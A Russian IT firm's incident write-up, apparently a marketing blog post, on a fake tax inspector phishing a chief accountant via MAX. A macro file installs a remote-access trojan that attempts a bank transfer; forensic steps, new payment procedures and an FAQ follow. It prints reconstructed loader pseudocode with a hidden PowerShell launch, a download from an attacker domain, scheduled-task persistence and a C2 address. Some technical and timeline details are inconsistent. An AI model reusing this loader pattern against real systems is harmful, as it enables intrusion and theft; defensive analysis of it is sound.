Главбуха развели в MAX: хронология атаки и наши процедуры после

К нам в ITfresh обратился директор торговой компании 32 РМ из района Очаково — оптовая торговля автозапчастями, оборот около 180 млн в год. В 17:42 во вторник он позвонил с одной фразой: «Главбух три часа разговаривала с ФНС в максе, открыла какой-то файл, и сейчас попыталась провести 280 тысяч непонятно куда — банк позвонил». В этом материале — поминутный разбор того, что произошло с 14:18 до 17:42, что в случившемся главбух сделала правильно (на удивление — многое), и какие шесть процедур мы внедрили в компании после, чтобы такая история не повторилась.

Что предшествовало звонку

За две недели до инцидента компания получила требование ФНС о представлении документов по контрагенту — это часть стандартной встречной проверки. Главбух обработала требование в обычном порядке: подготовила пакет документов, выгрузила их в Контур-Экстерн, отправила в инспекцию. Это была легальная коммуникация с налоговой, никаких подозрений она не вызывала.

Атакующие, по всей видимости, об этой проверке знали. Не факт, что у них был доступ к самому требованию — но они знали как минимум что компания недавно общалась с ФНС, и контекст «сверки» был очень правдоподобен. Откуда такая утечка — отдельный вопрос. Чаще всего это бывает: бухгалтер контрагента из дружеского чата, сотрудник инспекции, или просто открытые данные о судебных и налоговых процессах юрлица. Установить источник в нашем случае не удалось.

Что важно: атака была не «массовая рассылка», а целевая. Атакующие позвонили именно главбуху, именно этой компании, именно через MAX (а не через WhatsApp или Telegram, который у неё в основном использовании), и именно в обеденное время вторника, когда коллеги выходят на перерыв и в кабинете она оставалась одна. Это уже не «фишинг в надежде что кто-нибудь клюнет», а целенаправленный спир-фишинг.

14:18 — первый звонок

Главбуху позвонили в MAX с номера, который определился как «+7 495 ХХХ-ХХ-ХХ (Москва)». В MAX, в отличие от WhatsApp, нет жёсткой привязки звонка к одному из ваших контактов — там можно позвонить «не-контакту». Звонивший представился как «старший инспектор Орлова, отдел камеральных проверок ИФНС 27». Голос — женский, средних лет, спокойный, профессиональный. Никаких признаков стресса или давления в первые минуты — наоборот, очень корректный тон.

«Орлова» поинтересовалась, как у компании прошёл документооборот по последней встречной проверке, и сказала, что в системе появилось расхождение по одной из строк сверки — нужно дополнительно подтвердить контрольные суммы. Главбух удивилась: расхождений в её документах не должно быть, она их сама готовила. На что «Орлова» спокойно ответила: «Это бывает, у нас регулярно после миграции на новую базу всплывают такие косяки. Я вам скину файл сверки, посмотрите конкретно по строке 14, там у нас разница в 12 314 рублей».

Здесь главбух сделала первую правильную вещь — она усомнилась в самом факте звонка. И задала вопрос: «А почему вы звоните через мессенджер, обычно вы пишете требование через Контур». Ответ «Орловой»: «Дочка, я понимаю, что необычно, но у меня требование сдать выгрузку до конца дня, а в Контуре сейчас технические работы. Можем по-быстрому через MAX, потом я вам пришлю официальный ответ. Иначе придётся в установленный 5-дневный срок, а это уже скандал и штраф».

Это и был момент перелома. «Срочность» сработала. Главбух согласилась посмотреть файл.

Чем главбух могла остановить атаку прямо здесь

Положить трубку и перезвонить в свою инспекцию по официальному номеру с сайта nalog.gov.ru. Это занимает 5-7 минут. Реальная инспекторша сразу бы сказала, что никакого звонка в MAX от их имени быть не может. Атака бы прервалась.

Вторая опция — позвонить мне или напрямую директору и спросить «не подозрительно ли». Я ей это потом сказал: я никогда, ни при каких обстоятельствах не упрекаю клиента за лишний звонок «вдруг». Лучше 100 пустых звонков, чем один пропущенный инцидент.

14:52 — приём файла

«Орлова» прислала файл с именем Сверка_расчётов_2026_ООО_ХХХ.docm. Сам факт расширения .docm (а не .docx) — это макрос-документ Word. В современных версиях Office такие файлы по умолчанию открываются с отключёнными макросами и красной плашкой сверху «Включить редактирование», потом ещё одной «Включить макросы». Это две защитные кнопки, и обычно они достаточны.

Файл размером 184 КБ открылся в Word 2021, который у клиента стоит в составе лицензионного Office 365. Внутри — пустая таблица из 15 строк с надписью «Содержимое отображается некорректно. Включите макросы для просмотра данных сверки». «Орлова» по MAX параллельно зачитывала шаги: «Сейчас вверху появится плашка, нажмите Включить редактирование, потом Включить макросы — без этого таблица не отрисуется».

Главбух нажала. Обе кнопки. Word при этом отобразил предупреждение «Этот документ содержит макросы. Включение макросов из неизвестного источника опасно». Она это предупреждение прочитала — и проигнорировала, потому что параллельно «инспекторша» сказала: «Это стандартное предупреждение Microsoft, у нас все документы такие, ничего страшного».

Что было в макросе

Через 6 часов после инцидента я разобрал файл в изолированной VM. Внутри — Visual Basic for Applications-скрипт на 380 строк, обфусцированный (имена переменных типа aQwzXvKi). Распакованный, он делал следующее.

' Реконструированный псевдокод макроса
Sub AutoOpen()
    ' 1. Скачивание payload через PowerShell
    Dim cmd As String
    cmd = "powershell -nop -w hidden -enc " & _
          "JABjAGwAaQBlAG4AdAAgAD0AIABO..." ' base64 длиной 1200 символов
    Shell cmd, vbHide

    ' 2. Сохранение и запуск второй стадии
    ' payload скачивает RAT-агент по адресу
    ' https://docs-fns-checks[.]ru/static/2026_check.bin
    ' и кладёт в %APPDATA%\Microsoft\Office\office365update.exe

    ' 3. Регистрация в автозапуск через scheduled task
    ' schtasks /create /tn "OfficeUpdate" /tr "..." /sc onlogon /rl highest

    ' 4. Установка обратной связи с C2 через WebSocket
    ' wss://docs-fns-checks[.]ru:443/ws
End Sub

Это типичный загрузчик первой стадии. Он сам по себе ничего страшного не делает — только скачивает «настоящего» RAT-агента (Remote Access Trojan). RAT-агент — кастомный билд на основе SilentEye или клона NjRAT, который умеет: захват экрана раз в 5 секунд, перехват клавиатуры, чтение буфера обмена, доступ к файловой системе, удалённый запуск команд от имени пользователя. И главное — снимок окна банк-клиента в момент, когда пользователь видит SMS-код.

15:08-15:40 — захват сессии 1С и банк-клиента

После запуска макроса RAT-агент установился в фоновом режиме. У главбуха на компьютере не было антивируса с поведенческим анализом (стандартный Defender Windows 11 23H2 на тот момент пропустил эту малварь — мы потом проверили хеш в VirusTotal, до 14:52 во вторник никто из 67 движков её не детектировал). Только через 18 часов после нашего обращения в Microsoft и пары других вендоров хеш появился в списках Defender.

Атакующий немедленно сделал ряд действий через RAT:

• Сделал скриншот экрана. Главбух работала в 1С 8.3.24, окно было свёрнуто в трей, но открыта вкладка с входом в банк-клиент ВТБ.
• Запустил клавиатурный логгер. Главбух как раз набирала по номеру телефона коды и пароли в банк-клиент (для другой, легитимной платёжки).
• Получил доступ к буферу обмена. В буфере оказался ОКПО контрагента, который главбух копировала минут пять назад.
• Через 30 минут — выгрузил список последних 50 платёжек из 1С через работу с базой данных напрямую. Доступа к OLE-API 1С не требовалось — RAT просто читал сохранённые таблицы из C:\1Cv8\base\.

Параллельно в MAX «Орлова» продолжала разговор: «Видите, файл загрузился. Я сейчас сделаю с моей стороны экспорт по строке 14 и пришлю вам сверку, минут через 10-15. Только не закрывайте Word, у нас тут процесс выгрузки идёт». Это типичный приём — занять разговором, чтобы жертва не заметила, как изменилось поведение компьютера. Действительно, RAT-агент при первой инициализации даёт несколько секунд лагов курсора. Главбух это заметила — она сама мне об этом рассказала — но списала на «обычные тормоза».

16:22 — попытка перевода 280 000 рублей

Через 1 час 14 минут после установки макроса атакующий перешёл к финансовой части. Используя RAT-захват сессии главбуха, он открыл банк-клиент ВТБ (главбух к этому моменту туда уже логинилась для других нужд и сессия была активна). Создал платёжку:

• Получатель: ООО «Стройинвест-Сервис» (явно подставная фирма-однодневка, ОГРН зарегистрирован за месяц до инцидента).
• Сумма: 280 000 рублей.
• Назначение платежа: «Оплата по договору № 14/02 от 12.04.2026 за услуги маркетинга, в т.ч. НДС 46 666,67».
• ИНН получателя: 5024XXXXXXX (Красногорск, ИП который через месяц был ликвидирован).

Платёжка ушла на подпись. Дальше — критический момент. Главбух подписывала её SMS-кодом, который ей пришёл на рабочий мобильник. В тот же момент RAT-агент захватил скриншот экрана с этим SMS-кодом (телефон главбух держала рядом с монитором, что у бухгалтерии — норма). Атакующий ввёл SMS-код в банк-клиент. Платёж перешёл в статус «отправлено».

Как банк удержал перевод

В 17:12 (через 50 минут после подписания) сработал анти-фрод банка ВТБ. У этой компании в банке стандартная история — переводы в среднем 800 тыс — 2 млн руб в день, регулярные контрагенты, узкий круг получателей. Платёжка на 280 000 в адрес ИП в Красногорске, который раньше никогда не появлялся в платежах этой компании, попала в HOLD-список и потребовала повторного подтверждения от руководителя компании.

В 17:18 директору позвонил сотрудник банка с вопросом «Подтверждаете ли вы платёж номер NNNN от такого-то времени». Директор был не в курсе и сразу отказал. Платёжка ушла в reject, деньги остались на счёте. Параллельно директор пошёл в кабинет к главбуху, и тут картина выяснилась — она ещё не положила трубку с «Орловой», которая на этом этапе уже перешла к фразам типа «коллега, я уверена, что у вас сейчас на счёте подвисла операция, не пугайтесь, мы её разберём вместе».

Директор сразу понял, что происходит, выдернул сетевой кабель из компьютера главбуха, и в 17:42 позвонил мне. Это спасло компанию от полной потери 280 000 рублей и от продолжения атаки (атакующий через RAT-агент пытался ещё провести две платёжки на 145 и 198 тысяч на другие подставные ИП — обе тоже попали в анти-фрод).

Что мы сделали с 17:42 до утра среды

В 18:10 я был в офисе клиента в Очаково. Первое — изоляция компьютера главбуха. Сетевой кабель уже был выдернут. Компьютер не выключали (это бы стёрло волатильные данные из RAM, которые мне нужны были для расследования). Снял дамп памяти через Magnet RAM Capture, дамп пользовательского профиля, ветку реестра, журналы Windows Event Log.

# Снимаем дамп памяти живого компьютера (Windows 11)
.\MagnetRAMCapture.exe /accepteula /go /output:E:\incident-2026-04-27\ram.raw

# Список процессов на момент захвата
tasklist /v /fo csv > E:\incident-2026-04-27\processes.csv

# Активные TCP-соединения с PID
netstat -ano > E:\incident-2026-04-27\netstat.txt

# Журналы Windows за последние 24 часа
wevtutil epl Security E:\incident-2026-04-27\Security.evtx /q:"*[System[TimeCreated[timediff(@SystemTime) <= 86400000]]]"
wevtutil epl Application E:\incident-2026-04-27\Application.evtx
wevtutil epl System E:\incident-2026-04-27\System.evtx
wevtutil epl "Microsoft-Windows-PowerShell/Operational" E:\incident-2026-04-27\PS.evtx

# Скрытые сервисы и scheduled tasks
sc query type= service state= all > E:\incident-2026-04-27\services.txt
schtasks /query /fo csv /v > E:\incident-2026-04-27\schtasks.csv

# Регистр автозапуска
reg export "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" E:\incident-2026-04-27\run-hklm.reg
reg export "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" E:\incident-2026-04-27\run-hkcu.reg

В дампе памяти и в schtasks-журнале нашёл задачу «OfficeUpdate», которая каждый logon перезапускала office365update.exe из %APPDATA%\Microsoft\Office\. Это и был RAT-агент. Извлёк бинарь, прогнал через jadx и Ghidra, выудил адрес C2 — docs-fns-checks[.]ru на IP 185.XX.XX.XX (хостер в Молдове).

Сразу же передал IP в наш AdGuard-резолвер и блокирующий список MikroTik офиса — теперь даже если на каком-то компьютере компании окажется этот же RAT, он не сможет связаться с C2. Уведомил Kaspersky и Доктора Веба о новом IoC, ETag-хеш агента ушёл в их базы в течение 6 часов.

Восстановили компьютер главбуха с нуля: новый SSD, чистая установка Windows 11 24H2, развёртывание из золотого образа клиента, переустановка 1С 8.3.24 из дистрибутива (не из бэкапа — бэкап мог содержать заражённые исполняемые файлы), переподключение к серверу 1С по чистым кредам. Старый SSD упаковал в opaque-конверт и положил в сейф клиента — он нам ещё пригодился для дальнейшего расследования и как доказательство для полиции.

Шесть процедур, которые мы внедрили после

Через неделю после инцидента мы с директором и главбухом сели и переработали процедуры работы с финансами. Получилось шесть новых правил, которые сейчас закреплены в внутреннем регламенте компании.

Процедура 1: отдельный компьютер для банк-клиента

Купили мини-ПК Beelink Mini S12 (15 000 ₽) с лицензией Windows 11 Pro. На нём не установлено ничего, кроме банк-клиента ВТБ и СберБизнес. Никаких браузеров, никакого Office, никаких мессенджеров. Сеть — отдельная VLAN, доступ только к двум IP банков. Использует его только главбух, для подписания платёжек, после чего сразу блокирует и переключается обратно на основной компьютер.

Процедура 2: USB-токен с физическим контролем

Заменили SMS-авторизацию на двух-факторную подпись через USB-токен «Рутокен ЭП 3.0» (6 000 ₽ за штуку, лицензия КриптоПро CSP 5.0 на 2 года). Главбух хранит токен в сейфе, вставляет в USB-порт только в момент подписания платёжки, после подписания вынимает и убирает. Атакующий, имеющий удалённый доступ к компьютеру, не может подписать платёж без физического токена в порту.

Процедура 3: двух-факторное подтверждение любой платёжки выше 50 000 ₽

В нашем регламенте: любой платёж выше 50 000 ₽ требует подтверждения от директора по двум каналам — голосовой звонок на корпоративный мобильник и сообщение в Element X (наш Matrix-сервер). Это не «согласование», а финальное «да» перед нажатием кнопки. Если один из каналов недоступен — платёж переносится на следующий рабочий день. В среднем у клиента 5-8 таких платёжек в день, занимает по 90 секунд каждая — приемлемая нагрузка.

Процедура 4: выделенный «финансовый» мобильник без мессенджеров

Главбуху выдали отдельный Nokia 110 4G (3 800 ₽) — кнопочный телефон с двумя SIM. На нём — корпоративная SIM, через которую приходят SMS от банков и от ФНС. На основном смартфоне главбуха теперь нет банк-клиентов и нет приложения MAX. Личный смартфон с WhatsApp и Telegram она использует для общения с детьми и коллегами, но не для финансов.

Процедура 5: правило «5 минут паузы» при любом срочном звонке

Если кто-то звонит и требует срочного действия — главбух обязана положить трубку, поставить пятиминутный таймер, и в течение этих пяти минут перезвонить мне или директору. После этого можно перезванивать инициатору. Это правило мы повесили на стену в её кабинете на отдельной плашке. По нашему опыту, 9 из 10 социнженерных атак отсекаются именно правилом «не действовать сразу».

Процедура 6: phishing-симуляции раз в две недели

Внедрили GoPhish-кампанию: раз в две недели всем сотрудникам бухгалтерии и финансовой службы (6 человек) приходят тренировочные фишинг-письма — то «требование ФНС», то «приглашение на вебинар», то «обновите ваш мессенджер». Тех, кто кликает, проводим через 15-минутный разбор. Через 4 месяца после внедрения — клики упали с 4 из 6 до 0 из 6 на стандартные сценарии.

Что мы передали в полицию

Заявление подавали в УВД по ЦАО Москвы (по месту нахождения компании). Передали: дамп RAM, образ заражённого SSD, дамп .docm-файла, экспорт переписки в MAX (через скриншоты с временными метками), реквизиты подставного ИП «Стройинвест-Сервис», IP-адрес C2-сервера, хеши вредоносных файлов.

Возбудили дело по ст. 159 УК РФ (мошенничество в крупном размере). Расследование заняло 4 месяца, по результатам — следствие приостановлено в связи с невозможностью установить лиц. C2-сервер в Молдове, дроп-ИП в Красногорске — пустышка. Деньги возвращены не были (но они и не были списаны — спасибо банковскому анти-фроду). Юридическая значимость — компания смогла списать расходы на восстановление IT-инфраструктуры (около 250 000 рублей) на «потери от противоправных действий третьих лиц» в налоговом учёте.

FAQ: что чаще всего спрашивают клиенты

Может ли ФНС реально позвонить через мессенджер?

Налоговая инспекция в России общается с компаниями только через личный кабинет на nalog.gov.ru, через систему «Контур-Экстерн» или «1С-Отчётность», или через бумажные требования. Никаких официальных звонков через WhatsApp, Telegram или MAX от ФНС не существует — это всегда мошенники. Если требование от ФНС реальное, оно сначала появится в личном кабинете налогоплательщика, и только потом, при необходимости, может прийти вызов на формальную беседу — но через секретаря инспекции по городскому номеру, а не через мессенджер.

Что делать главбуху, если позвонили и требуют срочно что-то подписать или принять?

Положить трубку, не разрывая связь резко (вежливо: «я перезвоню через 10 минут»), и перезвонить по официальному номеру со страницы ведомства — не по номеру, который дал звонивший. Срочность — главный маркер соц-инженерии: ни одно государственное ведомство не работает в режиме «нужно прямо сейчас, иначе оштрафуем». У любого требования есть процедурные сроки в 5-10 рабочих дней. Если человек давит на срочность — это всегда красный флаг, и в нашей компании это первое правило, которому мы учим бухгалтерию.

Помогает ли двухфакторная авторизация на банк-клиенте?

Помогает, но недостаточно. Современные банк-клиенты для юрлиц используют SMS-код или push-уведомление, и злоумышленник, который имеет удалённый доступ к компьютеру главбуха, видит этот код в реальном времени. По нашей методике двухфакторная авторизация платежа — это: первый фактор — авторизация в банк-клиенте, второй фактор — физическое подтверждение на отдельном устройстве (USB-токен Рутокен с ЭП, который вынимается из компьютера между подписаниями). Это даёт реальную защиту: даже если злоумышленник получил пароль и SMS, он не сможет подписать платёж без физического токена в руке у главбуха.

Сколько стоит внедрение этих процедур и как долго?

Пакет внедрения для компании 20-40 РМ — 165 000 рублей, занимает 8-12 рабочих дней. В стоимость входит: установка отдельного компьютера для банк-клиента (10 000 ₽ железо + настройка), 2 USB-токена Рутокен ЭП 3.0 с лицензией (12 000 ₽), внедрение процедуры двух-факторного подтверждения платёжек, выдача отдельного мобильного телефона главбуху без мессенджеров (15 000 ₽ Nokia 110 4G + SIM), обучение бухгалтерии и тренировочные phishing-симуляции через GoPhish в течение 3 месяцев (24 000 ₽), регламент работы с финансами (15 страниц, согласован с юристом). Окупается одним предотвращённым инцидентом.

Можно ли поймать таких атакующих и вернуть деньги?

В подавляющем большинстве случаев — нет. Атакующие работают через прокси-цепочки, используют дропов (подставных получателей платежей), деньги через 30-60 минут после получения уходят на криптовалютные обменники. У наших клиентов из 4 случаев соц-инженерии за два года в одном — банковский антифрод удержал перевод (главбух успела позвонить нам и мы успели сообщить банку до подтверждения), в трёх — деньги ушли невозвратно. Заявление в полицию подаётся обязательно, чтобы получить возможность списать убыток в налоговом учёте, но реальные шансы возврата — около 5%. Поэтому единственная рабочая стратегия — не давать атаке состояться.

Итог

За 3 часа 24 минуты соц-инженерия превратилась из пустого звонка в попытку перевода 280 000 рублей. Спас компанию банковский анти-фрод и быстрая реакция директора. Через две недели мы внедрили шесть новых процедур, которые сделали повторение этой атаки невозможным — даже если злоумышленник снова дозвонится главбуху и заставит её открыть зловредный файл, без физического USB-токена и без двух-факторного подтверждения он деньги не уведёт. Эта история — про то, что технологии не главное. Главное — процедуры и привычки людей.